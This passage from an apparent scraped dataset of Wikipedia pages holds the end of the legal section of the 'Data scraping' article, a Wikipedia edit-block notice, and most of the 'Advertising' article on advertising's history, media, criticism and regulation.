scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
319 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/w/index.php?title=Data_scraping&action=edit§ion=2 | You do not have permission to edit this page, for the following reasons: The IP address or range 180.190.0.0 16 has been blocked by Stwalkerster for the following reason(s): Editing from this range has been disabled (blocked) in response to abuse. A range may be shared by many users and innocent users may be affected; if you believe that you are not the person this block is intended for, please follow the instructions below: If you have an account: Please log in to edit. In rare cases, in response to serious abuse, logged-in editing may also be disabled. If you still cannot edit, place unblock on your talk page and make reference to this message. You may wish to ping the blocking administrator or email them via the "email this user" function. If you do not have an account: Registered users are still able to edit. If you cannot create an account from this or another network, you may request that volunteers create your username for you. Please follow the instructions at Wikipedia:Request an account to request an account under your preferred username. It may take some time to process your request. Administrators: Please consult the blocking administrator before altering or lifting this block, and consider consulting with a CheckUser before granting an IP block exemption to an editor using this range. Note that large or hard (logged-in editing blocked) rangeblocks are usually only made in response to serious abuse, and the blocking admin may have information about this block which is essential to reviewing any unblock request. This block will expire on 09:06, 22 May 2032. Your current IP address is 180.190.75.212. Even when blocked, you will usually still be able to edit your user talk page, as well as email administrators and other editors. For information on how to proceed, please read the FAQ for blocked users and the guideline on block appeals. The guide to appealing blocks may also be helpful. Other useful links: Blocking policy Help:I have been blocked This block affects editing on all Wikimedia wikis. The IP address or range 180.190.0.0 16 has been globally blocked by for the following reason(s): Long-term abuse: If you are affected by this block, please message us: request This block will expire on 17:48, 21 December 2024. Your current IP address is 180.190.75.212. Even while globally blocked, you will usually still be able to edit pages on Meta-Wiki. If you believe you were blocked by mistake, you can find additional information and instructions in the No open proxies global policy. Otherwise, to discuss the block please post a request for review on Meta-Wiki. You could also send an email to the stewards VRT queue at stewards wikimedia.org including all above details. Other useful links: Global blocks Help:I have been blocked Return to Data scraping. |
320 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Advertisement | Advertising is the practice and techniques employed to bring attention to a product or service. Advertising aims to present a product or service in terms of utility, advantages and qualities of interest to consumers. It is typically used to promote a specific good or service, but there are a wide range of uses, the most common being the commercial advertisement. Commercial advertisements often seek to generate increased consumption of their products or services through "branding", which associates a product name or image with certain qualities in the minds of consumers. On the other hand, ads that intend to elicit an immediate sale are known as direct-response advertising. Non-commercial entities that advertise more than consumer products or services include political parties, interest groups, religious organizations and governmental agencies. Non-profit organizations may use free modes of persuasion, such as a public service announcement. Advertising may also help to reassure employees or shareholders that a company is viable or successful. In the 19th century, soap businesses were among the first to employ large-scale advertising campaigns. Thomas J. Barratt was hired by Pears to be its brand manager—the first of its kind—and in addition to creating slogans and images he recruited West End stage actress and socialite Lillie Langtry to become the poster-girl for Pears, making her the first celebrity to endorse a commercial product. 1 Modern advertising originated with the techniques introduced with tobacco advertising in the 1920s, most significantly with the campaigns of Edward Bernays, considered the founder of modern, "Madison Avenue" advertising. 2 3 Worldwide spending on advertising in 2015 amounted to an estimated US$529.43 billion. 4 Advertising's projected distribution for 2017 was 40.4% on TV, 33.3% on digital, 9% on newspapers, 6.9% on magazines, 5.8% on outdoor and 4.3% on radio. 5 Internationally, the largest ("Big Five") advertising agency groups are Omnicom, WPP, Publicis, Interpublic, and Dentsu. 6 In Latin, advertere means "to turn towards". 7 Egyptians used papyrus to make sales messages and wall posters. 8 Commercial messages and political campaign displays have been found in the ruins of Pompeii and ancient Arabia. Lost and found advertising on papyrus was common in ancient Greece and ancient Rome. Wall or rock painting for commercial advertising is another manifestation of an ancient advertising form, which is present to this day in many parts of Asia, Africa, and South America. The tradition of wall painting can be traced back to Indian rock art paintings that date back to 4000 BC. 9 In ancient China, the earliest advertising known was oral, as recorded in the Classic of Poetry (11th to 7th centuries BC) of bamboo flutes played to sell confectionery. Advertisement usually takes in the form of calligraphic signboards and inked papers. A copper printing plate dated back to the Song dynasty used to print posters in the form of a square sheet of paper with a rabbit logo with "Jinan Liu's Fine Needle Shop" and "We buy high-quality steel rods and make fine-quality needles, to be ready for use at home in no time" written above and below 10 is considered the world's earliest identified printed advertising medium. 11 In Europe, as the towns and cities of the Middle Ages began to grow, and the general population was unable to read, instead of signs that read "cobbler", "miller", "tailor", or "blacksmith", images associated with their trade would be used such as a boot, a suit, a hat, a clock, a diamond, a horseshoe, a candle or even a bag of flour. Fruits and vegetables were sold in the city square from the backs of carts and wagons and their proprietors used street callers (town criers) to announce their whereabouts. The first compilation of such advertisements was gathered in "Les Crieries de Paris", a thirteenth-century poem by Guillaume de la Villeneuve. 12 In the 18th century advertisements started to appear in weekly newspapers in England. These early print advertisements were used mainly to promote books and newspapers, which became increasingly affordable with advances in the printing press; and medicines, which were increasingly sought after. However, false advertising and so-called "quack" advertisements became a problem, which ushered in the regulation of advertising content. In the United States, newspapers grew quickly in the first few decades of the 19th century, in part due to advertising. By 1822, the United States had more newspaper readers than any other country. About half of the content of these newspapers consisted of advertising, usually local advertising, with half of the daily newspapers in the 1810s using the word "advertiser" in their name. 13 In August 1859, British pharmaceutical firm Beechams created a slogan for Beecham's Pills: "Beechams Pills: Worth a guinea a box", which is considered to be the world's first advertising slogan. 14 The Beechams adverts would appear in newspapers all over the world, helping the company become a global brand. 14 15 The phrase was said to be uttered by a satisfied lady purchaser from St Helens, Lancashire, the founder's home town. 16 In June 1836, French newspaper La Presse was the first to include paid advertising in its pages, citation needed allowing it to lower its price, extend its readership and increase its profitability and the formula was soon copied by all titles. Around 1840, Volney B. Palmer established the roots of the modern day advertising agency in Philadelphia. In 1842 Palmer bought large amounts of space in various newspapers at a discounted rate then resold the space at higher rates to advertisers. The actual ad the copy, layout, and artwork was still prepared by the company wishing to advertise; in effect, Palmer was a space broker. The situation changed when the first full-service advertising agency of N.W. Ayer Son was founded in 1869 in Philadelphia. Ayer Son offered to plan, create, and execute complete advertising campaigns for its customers. By 1900 the advertising agency had become the focal point of creative planning, and advertising was firmly established as a profession. 17 Around the same time, in France, Charles-Louis Havas extended the services of his news agency, Havas to include advertisement brokerage, making it the first French group to organize. At first, agencies were brokers for advertisement space in newspapers. 17 The late 19th and early 20th centuries saw the rise of modern advertising, driven by industrialization and the growth of consumer goods. This era saw the dawn of ad agencies, employing more cunning methods— persuasive diction and psychological tactics. 18 Thomas J. Barratt of London has been called "the father of modern advertising". 19 20 21 Working for the Pears soap company, Barratt created an effective advertising campaign for the company products, which involved the use of targeted slogans, images and phrases. One of his slogans, "Good morning. Have you used Pears' soap? was famous in its day and into the 20th century. 22 23 In 1882, Barratt recruited English actress and socialite Lillie Langtry to become the poster-girl for Pears, making her the first celebrity to endorse a commercial product. 1 24 Becoming the company's brand manager in 1865, listed as the first of its kind by the Guinness Book of Records, Barratt introduced many of the crucial ideas that lie behind successful advertising and these were widely circulated in his day. He constantly stressed the importance of a strong and exclusive brand image for Pears and of emphasizing the product's availability through saturation campaigns. He also understood the importance of constantly reevaluating the market for changing tastes and mores, stating in 1907 that "tastes change, fashions change, and the advertiser has to change with them. An idea that was effective a generation ago would fall flat, stale, and unprofitable if presented to the public today. Not that the idea of today is always better than the older idea, but it is different it hits the present taste. 20 Enhanced advertising revenues was one effect of the Industrial Revolution in Britain. 25 Thanks to the revolution and the consumers it created, by the mid 19th century biscuits and chocolate became products for the masses, and British biscuit manufacturers were among the first to introduce branding to distinguish grocery products. 26 27 One the world's first global brands, Huntley Palmers biscuits were sold in 172 countries in 1900, and their global reach was reflected in their advertisements. 26 As a result of massive industrialization, advertising increased dramatically in the United States. In 1919 it was 2.5 percent of gross domestic product (GDP) in the US, and it averaged 2.2 percent of GDP between then and at least 2007, though it may have declined dramatically since the Great Recession. Industry could not benefit from its increased productivity without a substantial increase in consumer spending. This contributed to the development of mass marketing designed to influence the population's economic behavior on a larger scale. 29 In the 1910s and 1920s, advertisers in the U.S. adopted the doctrine that human instincts could be targeted and harnessed "sublimated" into the desire to purchase commodities. 30 Edward Bernays, a nephew of Sigmund Freud, became associated with the method and is sometimes called the founder of modern advertising and public relations. 31 Bernays claimed that: The general principle, that men are very largely actuated by motives which they conceal from themselves, is as true of mass as of individual psychology. It is evident that the successful propagandist must understand the true motives and not be content to accept the reasons which men give for what they do. 32 In other words, selling products by appealing to the rational minds of customers (the main method used prior to Bernays) was much less effective than selling products based on the unconscious desires that Bernays felt were the true motivators of human action. "Sex sells" became a controversial issue, with techniques for titillating and enlarging the audience posing a challenge to conventional morality. 33 34 In the 1920s, under Secretary of Commerce Herbert Hoover, the American government promoted advertising. Hoover himself delivered an address to the Associated Advertising Clubs of the World in 1925 called 'Advertising Is a Vital Force in Our National Life. 35 In October 1929, the head of the U.S. Bureau of Foreign and Domestic Commerce, Julius Klein, stated "Advertising is the key to world prosperity. 36 This was part of the "unparalleled" collaboration between business and government in the 1920s, according to a 1933 European economic journal. 37 The tobacco companies became major advertisers in order to sell packaged cigarettes. 38 The tobacco companies pioneered the new advertising techniques when they hired Bernays to create positive associations with tobacco smoking. 2 3 Advertising was also used as a vehicle for cultural assimilation, encouraging workers to exchange their traditional habits and community structure in favor of a shared "modern" lifestyle. 39 An important tool for influencing immigrant workers was the American Association of Foreign Language Newspapers (AAFLN). The AAFLN was primarily an advertising agency but also gained heavily centralized control over much of the immigrant press. 40 41 At the turn of the 20th century, advertising was one of the few career choices for women. Since women were responsible for most household purchasing done, advertisers and agencies recognized the value of women's insight during the creative process. In fact, the first American advertising to use a sexual sell was created by a woman for a soap product. Although tame by today's standards, the advertisement featured a couple with the message "A skin you love to touch". 42 In the 1920s, psychologists Walter D. Scott and John B. Watson contributed applied psychological theory to the field of advertising. Scott said, "Man has been called the reasoning animal but he could with greater truthfulness be called the creature of suggestion. He is reasonable, but he is to a greater extent suggestible". 43 He demonstrated this through his advertising technique of a direct command to the consumer. In the early 1920s, the first radio stations were established by radio equipment manufacturers, followed by non-profit organizations such as schools, clubs and civic groups who also set up their own stations. 44 Retailer and consumer goods manufacturers quickly recognized radio's potential to reach consumers in their home and soon adopted advertising techniques that would allow their messages to stand out; slogans, mascots, and jingles began to appear on radio in the 1920s and early television in the 1930s. 45 The rise of mass media communications allowed manufacturers of branded goods to bypass retailers by advertising directly to consumers. This was a major paradigm shift which forced manufacturers to focus on the brand and stimulated the need for superior insights into consumer purchasing, consumption and usage behavior; their needs, wants and aspirations. 46 The earliest radio drama series were sponsored by soap manufacturers and the genre became known as a soap opera. 47 Before long, radio station owners realized they could increase advertising revenue by selling 'air-time' in small time allocations which could be sold to multiple businesses. By the 1930s, these advertising spots, as the packets of time became known, were being sold by the station's geographical sales representatives, ushering in an era of national radio advertising. 48 By the 1940s, manufacturers began to recognize the way in which consumers were developing personal relationships with their brands in a social psychological anthropological sense. 49 Advertisers began to use motivational research and consumer research to gather insights into consumer purchasing. Strong branded campaigns for Chrysler and Exxon Esso, using insights drawn research methods from psychology and cultural anthropology, led to some of the most enduring campaigns of the 20th century. 50 In the early 1950s, the DuMont Television Network began the modern practice of selling advertisement time to multiple sponsors. Previously, DuMont had trouble finding sponsors for many of their programs and compensated by selling smaller blocks of advertising time to several businesses. This eventually became the standard for the commercial television industry in the United States. However, it was still a common practice to have single sponsor shows, such as The United States Steel Hour. In some instances the sponsors exercised great control over the content of the show up to and including having one's advertising agency actually writing the show. 51 The single sponsor model is much less prevalent now, a notable exception being the Hallmark Hall of Fame. citation needed 52 The late 1980s and early 1990s saw the introduction of cable television and particularly MTV. Pioneering the concept of the music video, MTV ushered in a new type of advertising: the consumer tunes in for the advertising message, rather than it being a by-product or afterthought. As cable and satellite television became increasingly prevalent, specialty channels emerged, including channels entirely devoted to advertising, such as QVC, Home Shopping Network, and ShopTV Canada. 53 With the advent of the ad server, online advertising grew, contributing to the "dot-com" boom of the 1990s. 54 Entire corporations operated solely on advertising revenue, offering everything from coupons to free Internet access. At the turn of the 21st century, some websites, including the search engine Google, changed online advertising by personalizing ads based on web browsing behavior. This has led to other similar efforts and an increase in interactive advertising. 55 Online advertising introduced new opportunities for targeting and engagement, with platforms like Google and Facebook leading the charge. This shift has significantly altered the advertising landscape, making digital advertising a dominant force in the industry. 56 The share of advertising spending relative to GDP has changed little across large changes in media since 1925. In 1925, the main advertising media in America were newspapers, magazines, signs on streetcars, and outdoor posters. Advertising spending as a share of GDP was about 2.9 percent. By 1998, television and radio had become major advertising media; by 2017, the balance between broadcast and online advertising had shifted, with online spending exceeding broadcast. 57 Nonetheless, advertising spending as a share of GDP was slightly lower about 2.4 percent. 58 Guerrilla marketing involves unusual approaches such as staged encounters in public places, giveaways of products such as cars that are covered with brand messages, and interactive advertising where the viewer can respond to become part of the advertising message. This type of advertising is unpredictable, which causes consumers to buy the product or idea. 59 This reflects an increasing trend of interactive and "embedded" ads, such as via product placement, having consumers vote through text messages, and various campaigns utilizing social network services such as Facebook or Twitter. 60 The advertising business model has also been adapted in recent years. when? clarification needed In media for equity, advertising is not sold, but provided to start-up companies in return for equity. If the company grows and is sold, the media companies receive cash for their shares. Domain name registrants (usually those who register and renew domains as an investment) sometimes "park" their domains and allow advertising companies to place ads on their sites in return for per-click payments. These ads are typically driven by pay per click search engines like Google or Yahoo, but ads can sometimes be placed directly on targeted domain names through a domain lease or by making contact with the registrant of a domain name that describes a product. Domain name registrants are generally easy to identify through WHOIS records that are publicly available at registrar websites. 61 Advertising may be categorized in a variety of ways, including by style, target audience, geographic scope, medium, or purpose. 62 : 9 15 For example, in print advertising, classification by style can include display advertising (ads with design elements sold by size) vs. classified advertising (ads without design elements sold by the word or line). Advertising may be local, national or global. An ad campaign may be directed toward consumers or to businesses. The purpose of an ad may be to raise awareness (brand advertising), or to elicit an immediate sale (direct response advertising). The term above the line (ATL) is used for advertising involving mass media; more targeted forms of advertising and promotion are referred to as below the line (BTL). 63 64 The two terms date back to 1954 when Procter Gamble began paying their advertising agencies differently from other promotional agencies. 65 In the 2010s, as advertising technology developed, a new term, through the line (TTL) began to come into use, referring to integrated advertising campaigns. 66 67 Virtually any medium can be used for advertising. Commercial advertising media can include wall paintings, billboards, street furniture components, printed flyers and rack cards, radio, cinema and television adverts, web banners, mobile telephone screens, shopping carts, web popups, skywriting, bus stop benches, human billboards and forehead advertising, magazines, newspapers, town criers, sides of buses, banners attached to or sides of airplanes ("logojets"), in-flight advertisements on seatback tray tables or overhead storage bins, taxicab doors, roof mounts and passenger screens, musical stage shows, subway platforms and trains, elastic bands on disposable diapers, doors of bathroom stalls, stickers on apples in supermarkets, shopping cart handles (grabertising), the opening section of streaming audio and video, posters, and the backs of event tickets and supermarket receipts. Any situation in which an "identified" sponsor pays to deliver their message through a medium is advertising. 68 A new advertising approach is known as advanced advertising, which is data-driven advertising, using large quantities of data, precise measuring tools and precise targeting. 86 Advanced advertising also makes it easier for companies which sell ad-space to attribute customer purchases to the ads they display or broadcast. 87 Increasingly, other media are overtaking many of the "traditional" media such as television, radio and newspaper because of a shift toward the usage of the Internet for news and music as well as devices like digital video recorders (DVRs) such as TiVo. 88 Online advertising began with unsolicited bulk e-mail advertising known as "e-mail spam". Spam has been a problem for e-mail users since 1978. 89 As new online communication channels became available, advertising followed. The first banner ad appeared on the World Wide Web in 1994. 90 Prices of Web-based advertising space are dependent on the "relevance" of the surrounding web content and the traffic that the website receives. citation needed In online display advertising, display ads generate awareness quickly. Unlike search, which requires someone to be aware of a need, display advertising can drive awareness of something new and without previous knowledge. Display works well for direct response. Display is not only used for generating awareness, it is used for direct response campaigns that link to a landing page with a clear 'call to action'. citation needed As the mobile phone became a new mass medium in 1998 when the first paid downloadable content appeared on mobile phones in Finland, 91 citation needed mobile advertising followed, also first launched in Finland in 2000. citation needed By 2007 the value of mobile advertising had reached $2 billion and providers such as Admob delivered billions of mobile ads. citation needed More advanced mobile ads include banner ads, coupons, Multimedia Messaging Service picture and video messages, advergames and various engagement marketing campaigns. A particular feature driving mobile ads is the 2D barcode, which replaces the need to do any typing of web addresses, and uses the camera feature of modern phones to gain immediate access to web content. 83 percent of Japanese mobile phone users already are active users of 2D barcodes. 92 Some companies have proposed placing messages or corporate logos on the side of booster rockets and the International Space Station. 93 Unpaid advertising (also called "publicity advertising"), can include personal recommendations ("bring a friend", "sell it"), spreading buzz, or achieving the feat of equating a brand with a common noun (in the United States, "Xerox" "photocopier", "Kleenex" tissue, "Vaseline" petroleum jelly, "Hoover" vacuum cleaner, and "Band-Aid" adhesive bandage). However, some companies which? oppose the use of their brand name to label an object. Equating a brand with a common noun also risks turning that brand into a generic trademark turning it into a generic term which means that its legal protection as a trademark is lost. 94 disputed discuss Early in its life, The CW aired short programming breaks called "Content Wraps", to advertise one company's product during an entire commercial break. The CW pioneered "content wraps" and some products featured were Herbal Essences, Crest, Guitar Hero II, CoverGirl, and Toyota. 95 96 A new promotion concept has appeared, "ARvertising", advertising on augmented reality technology. 97 Controversy exists on the effectiveness of subliminal advertising (see mind control), and the pervasiveness of mass messages (propaganda). With the Internet came many new advertising opportunities. Pop-up, Flash, banner, pop-under, advergaming, and email advertisements (all of which are often unwanted or spam in the case of email) are now commonplace. Particularly since the rise of "entertaining" advertising, some people may like an advertisement enough to wish to watch it later or show a friend. citation needed In general, the advertising community has not yet made this easy, although some have used the Internet to widely distribute their ads to anyone willing to see or hear them. In the last three quarters of 2009, mobile and Internet advertising grew by 18% and 9% respectively, while older media advertising saw declines: 10.1% (TV), 11.7% (radio), 14.8% (magazines) and 18.7% (newspapers). citation needed Between 2008 and 2014, U.S. newspapers lost more than half their print advertising revenue. 99 Another significant trend regarding future of advertising is the growing importance of the niche market using niche or targeted ads. Also brought about by the Internet and the theory of the long tail, advertisers will have an increasing ability to reach specific audiences. In the past, the most efficient way to deliver a message was to blanket the largest mass market audience possible. citation needed However, usage tracking, customer profiles and the growing popularity of niche content brought about by everything from blogs to social networking sites, provide advertisers with audiences that are smaller but much better defined, citation needed leading to ads that are more relevant to viewers and more effective for companies' marketing products. Among others, Comcast Spotlight is one such advertiser employing this method in their video on demand menus. These advertisements are targeted to a specific group and can be viewed by anyone wishing to find out more about a particular business or practice, from their home. This causes the viewer to become proactive and actually choose what advertisements they want to view. 100 Niche marketing could also be helped by bringing the issue of color into advertisements. Different colors play major roles when it comes to marketing strategies, for example, seeing the blue can promote a sense of calmness and gives a sense of security which is why many social networks such as Facebook use blue in their logos. Google AdSense is an example of niche marketing. Google calculates the primary purpose of a website and adjusts ads accordingly; it uses keywords on the page (or even in emails) to find the general ideas of topics disused and places ads that will most likely be clicked on by viewers of the email account or website visitors. The concept of crowdsourcing has given way to the trend of user-generated advertisements. User-generated ads are created by people, as opposed to an advertising agency or the company themselves, often resulting from brand sponsored advertising competitions. For the 2007 Super Bowl, the Frito-Lays division of PepsiCo held the "Crash the Super Bowl" contest, allowing people to create their own Doritos commercials. 101 Chevrolet held a similar competition for their Tahoe line of SUVs. 101 Due to the success of the Doritos user-generated ads in the 2007 Super Bowl, Frito-Lays relaunched the competition for the 2009 and 2010 Super Bowl. The resulting ads were among the most-watched and most-liked Super Bowl ads. In fact, the winning ad that aired in the 2009 Super Bowl was ranked by the USA Today Super Bowl Ad Meter as the top ad for the year while the winning ads that aired in the 2010 Super Bowl were found by Nielsen's BuzzMetrics to be the "most buzzed-about". 102 103 Another example of companies using crowdsourcing successfully is the beverage company Jones Soda that encourages consumers to participate in the label design themselves. 104 This trend has given rise to several online platforms that host user-generated advertising competitions on behalf of a company. Founded in 2007, Zooppa has launched ad competitions for brands such as Google, Nike, Hershey's, General Mills, Microsoft, NBC Universal, Zinio, and Mini Cooper. 105 Crowdsourcing remains controversial, as the long-term impact on the advertising industry is still unclear. 106 Advertising has gone through five major stages of development: domestic, export, international, multi-national, and global. For global advertisers, there are four, potentially competing, business objectives that must be balanced when developing worldwide advertising: building a brand while speaking with one voice, developing economies of scale in the creative process, maximizing local effectiveness of ads, and increasing the company's speed of implementation. Born from the evolutionary stages of global marketing are the three primary and fundamentally different approaches to the development of global advertising executions: exporting executions, producing local executions, and importing ideas that travel. 107 Advertising research is key to determining the success of an ad in any country or region. The ability to identify which elements and or moments of an ad contribute to its success is how economies of scale are maximized. Once one knows what works in an ad, that idea or ideas can be imported by any other market. Market research measures, such as Flow of Attention, Flow of Emotion and branding moments provide insight into what is working in an ad in any country or region because the measures are based on the visual, not verbal, elements of the ad. 108 Foreign governments, which? particularly those that own marketable commercial products or services, often promote their interests and positions through the advertising of those goods because the target audience is not only largely unaware of the forum as a vehicle for foreign messaging but also willing to receive the message while in a mental state of absorbing information from advertisements during television commercial breaks, while reading a periodical, or while passing by billboards in public spaces. A prime example of this messaging technique is advertising campaigns to promote international travel. While advertising foreign destinations and services may stem from the typical goal of increasing revenue by drawing more tourism, some travel campaigns carry the additional or alternative intended purpose of promoting good sentiments or improving existing ones among the target audience towards a given nation or region. It is common for advertising promoting foreign countries to be produced and distributed by the tourism ministries of those countries, so these ads often carry political statements and or depictions of the foreign government's desired international public perception. Additionally, a wide range of foreign airlines and travel-related services which advertise separately from the destinations, themselves, are owned by their respective governments; examples include, though are not limited to, the Emirates airline (Dubai), Singapore Airlines (Singapore), Qatar Airways (Qatar), China Airlines (Taiwan Republic of China), and Air China (People's Republic of China). By depicting their destinations, airlines, and other services in a favorable and pleasant light, countries market themselves to populations abroad in a manner that could mitigate prior public impressions. In the realm of advertising agencies, continued industry diversification has seen observers note that "big global clients don't need big global agencies any more". 109 This is reflected by the growth of non-traditional agencies in various global markets, such as Canadian business TAXI and SMART in Australia and has been referred to as "a revolution in the ad world". 110 The ability to record shows on digital video recorders (such as TiVo) allow watchers to record the programs for later viewing, enabling them to fast forward through commercials. Additionally, as more seasons of pre-recorded box sets are offered for sale of television programs; fewer people watch the shows on TV. However, the fact that these sets are sold, means the company will receive additional profits from these sets. To counter this effect, a variety of strategies have been employed. Many advertisers have opted for product placement on TV shows like Survivor. Other strategies include integrating advertising with internet-connected program guidess (EPGs), advertising on companion devices (like smartphones and tablets) during the show, and creating mobile apps for TV programs. Additionally, some like brands have opted for social television sponsorship. 111 The emerging technology of drone displays has recently been used for advertising purposes. 112 In recent years there have been several media literacy initiatives, and more specifically concerning advertising, that seek to empower citizens in the face of media advertising campaigns. 113 Advertising education has become popular with bachelor, master and doctorate degrees becoming available in the emphasis. citation needed A surge in advertising interest is typically attributed to the strong relationship advertising plays in cultural and technological changes, such as the advance of online social networking. citation needed A unique model for teaching advertising is the student-run advertising agency, where advertising students create campaigns for real companies. 114 Organizations such as the American Advertising Federation establish companies with students to create these campaigns. citation needed Advertising is at the front of delivering the proper message to customers and prospective customers. The purpose of advertising is to inform the consumers about their product and convince customers that a company's services or products are the best, enhance the image of the company, point out and create a need for products or services, demonstrate new uses for established products, announce new products and programs, reinforce the salespeople's individual messages, draw customers to the business, and to hold existing customers. 115 Sales promotions are another way to advertise. Sales promotions are double purposed because they are used to gather information about what type of customers one draws in and where they are, and to jump start sales. Sales promotions include things like contests and games, sweepstakes, product giveaways, samples coupons, loyalty programs, and discounts. The ultimate goal of sales promotions is to stimulate potential customers to action. 116 While advertising can be seen as necessary for economic growth, 36 it is not without social costs. Unsolicited commercial e-mail and other forms of spam have become so prevalent as to have become a major nuisance to users of these services, as well as being a financial burden on internet service providers. 117 Advertising is increasingly invading public spaces, such as schools, which some critics argue is a form of child exploitation. 118 This increasing difficulty in limiting exposure to specific audiences can result in negative backlash for advertisers. 119 In tandem with these criticisms, the advertising industry has seen low approval rates in surveys and negative cultural portrayals. 120 A 2021 study found that for more than 80% of brands, advertising had a negative return on investment. 121 Unsolicited ads have been criticized as attention theft. 122 One of the most controversial criticisms of advertisement in the present day is that of the predominance of advertising of foods high in sugar, fat, and salt specifically to children. Critics claim that food advertisements targeting children are exploitive and are not sufficiently balanced with proper nutritional education to help children understand the consequences of their food choices. Additionally, children may not understand that they are being sold something, and are therefore more impressionable. 123 Michelle Obama has criticized large food companies for advertising unhealthy foods largely towards children and has requested that food companies either limit their advertising to children or advertise foods that are more in line with dietary guidelines. 124 The other criticisms include the change that are brought by those advertisements on the society and also the deceiving ads that are aired and published by the corporations. Cosmetic and health industry are the ones which exploited the highest and created reasons of concern. 125 Political advertisement and their regulations have been scrutinized for misinformation, ethics and political bias. 126 There have been increasing efforts to protect the public interest by regulating the content and the influence of advertising. Some examples include restrictions for advertising alcohol, tobacco or gambling imposed in many countries, as well as the bans around advertising to children, which exist in parts of Europe. Advertising regulation focuses heavily on the veracity of the claims and as such, there are often tighter restrictions placed around advertisements for food and healthcare products. 127 The advertising industries within some countries rely less on laws and more on systems of self-regulation. 127 128 129 Advertisers and the media agree on a code of advertising standards that they attempt to uphold. The general aim of such codes is to ensure that any advertising is 'legal, decent, honest and truthful'. Some self-regulatory organizations are funded by the industry, but remain independent, with the intent of upholding the standards or codes like the Advertising Standards Authority in the UK. 130 In the UK, most forms of outdoor advertising such as the display of billboards is regulated by the UK Town and County Planning system. Currently, the display of an advertisement without consent from the Planning Authority is a criminal offense liable to a fine of 2,500 per offense. 131 In the US, many communities believe that many forms of outdoor advertising blight the public realm. 132 As long ago as the 1960s in the US, there were attempts to ban billboard advertising in the open countryside. 133 Cities such as S o Paulo have introduced an outright ban 134 with London also having specific legislation to control unlawful displays. Some governments restrict the languages that can be used in advertisements, but advertisers may employ tricks to try avoiding them. In France for instance, advertisers sometimes print English words in bold and French translations in fine print to deal with Article 120 of the 1994 Toubon Law limiting the use of English. 135 The advertising of pricing information is another topic of concern for governments. In the United States for instance, it is common for businesses to only mention the existence and amount of applicable taxes at a later stage of a transaction. 136 In Canada and New Zealand, taxes can be listed as separate items, as long as they are quoted up-front. 137 138 In most other countries, the advertised price must include all applicable taxes, enabling customers to easily know how much it will cost them. 139 140 141 Various competing models of hierarchies of effects attempt to provide a theoretical underpinning to advertising practice. clarification needed 142 The marketing mix was proposed by professor E. Jerome McCarthy in the 1960s. 146 It consists of four basic elements called the "four Ps". Product is the first P representing the actual product. Price represents the process of determining the value of a product. Place represents the variables of getting the product to the consumer such as distribution channels, market coverage and movement organization. The last P stands for Promotion which is the process of reaching the target market and convincing them to buy the product. In the 1990s, the concept of four Cs was introduced as a more customer-driven replacement of four P's. 147 There are two theories based on four Cs: Lauterborn's four Cs (consumer, cost, communication, convenience) 148 and Shimizu's four Cs (commodity, cost, communication, channel) in the 7Cs Compass Model (Co-marketing). Communications can include advertising, sales promotion, public relations, publicity, personal selling, corporate identity, internal communication, SNS, and MIS. 149 150 151 152 Advertising research is a specialized form of research that works to improve the effectiveness and efficiency of advertising. It entails numerous forms of research which employ different methodologies. Advertising research includes pre-testing (also known as copy testing) and post-testing of ads and or campaigns. Pre-testing includes a wide range of qualitative and quantitative techniques, including: focus groups, in-depth target audience interviews (one-on-one interviews), small-scale quantitative studies and physiological measurement. The goal of these investigations is to better understand how different groups respond to various messages and visual prompts, thereby providing an assessment of how well the advertisement meets its communications goals. 153 Post-testing employs many of the same techniques as pre-testing, usually with a focus on understanding the change in awareness or attitude attributable to the advertisement. 154 With the emergence of digital advertising technologies, many firms have begun to continuously post-test ads using real-time data. This may take the form of A B split-testing or multivariate testing. Continuous ad tracking and the Communicus System are competing examples of post-testing advertising research types. 155 Meanings between consumers and marketers depict signs and symbols that are encoded in everyday objects. 156 Semiotics is the study of signs and how they are interpreted. Advertising has many hidden signs and meanings within brand names, logos, package designs, print advertisements, and television advertisements. Semiotics aims to study and interpret the message being conveyed in (for example) advertisements. Logos and advertisements can be interpreted at two levels known as the surface level and the underlying level. The surface level uses signs creatively to create an image or personality for a product. citation needed These signs can be images, words, fonts, colors, or slogans. The underlying level is made up of hidden meanings. The combination of images, words, colors, and slogans must be interpreted by the audience or consumer. 157 The "key to advertising analysis" is the signifier and the signified. The signifier is the object and the signified is the mental concept. 158 A product has a signifier and a signified. The signifier is the color, brand name, logo design, and technology. The signified has two meanings known as denotative and connotative. The denotative meaning is the meaning of the product. A television's denotative meaning might be that it is high definition. The connotative meaning is the product's deep and hidden meaning. A connotative meaning of a television would be that it is top-of-the-line. 159 Apple's commercials when? used a black silhouette of a person that was the age of Apple's target market. They placed the silhouette in front of a blue screen so that the picture behind the silhouette could be 